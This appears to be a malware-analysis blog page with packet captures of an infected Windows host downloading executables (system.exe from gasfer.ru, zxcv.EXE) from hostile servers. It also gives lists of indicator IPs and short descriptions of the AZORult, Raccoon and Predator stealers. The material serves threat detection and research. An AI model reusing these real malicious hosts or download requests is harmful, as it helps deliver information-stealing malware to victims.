Malware downloads and loads the dropper from the 64.31.23.26 but the host is down so it dies at this point.
Hostile IPs:
64.31.23.26
81.177.135.143
2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
E…..@….!
.
.Q….S.P……..P.@)Zs..GET /system.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gasfer.ru
Connection: Keep-Alive
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
E..(..@…..
.
.@….,.P.3..X.}.P.?..z……..
2020-05-29 21:35:33.690338 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], ack 394, win 237, length 0
E..(..@.2…Q…
.
..P.S…….^P………….
2020-05-29 21:35:33.730407 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [P.], seq 1:276, ack 394, win 237, length 275: HTTP: HTTP/1.1 200 OK
E..;..@.2…Q…
.
..P.S…….^P…….HTTP/1.1 200 OK
Date: Sat, 30 May 2020 01:37:41 GMT
Content-Type: application/octet-stream
Content-Length: 94720
Connection: keep-alive
Server: Jino.ru/mod_pizza
Last-Modified: Sat, 09 May 2020 23:44:17 GMT
ETag: “503c713-17200-5a53fb1282665”
Accept-Ranges: bytes
2020-05-29 21:35:33.731426 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], seq 276:1736, ack 394, win 237, length 1460: HTTP
E…..@.2..6Q…
.
..P.S…….^P….^..MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
2020-05-29 21:35:33.348218 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [P.], seq 3090396531:3090396582, ack 1491893693, win 16363, length 51: HTTP
E..[..@…..
.
.@….,.P.3.sX.}.P.?.4/……….`:…..k.>…t.Y..5.=T}[[..K.)a……j. .hg
2020-05-29 21:35:33.374491 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [.], ack 51, win 271, length 0
E..(t.@.0.j.@…
.
..P.,X.}..3..P…>|……..
2020-05-29 21:35:33.455371 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [P.], seq 1:50, ack 51, win 271, length 49: HTTP
E..Yt.@.0.j.@…
.
..P.,X.}..3..P….B……,..’.x..1…..%..p..W.:.q…fj..y…….c.G~/
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
E..(..@…..
.
.@….,.P.3..X.}.P.?..z……..
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
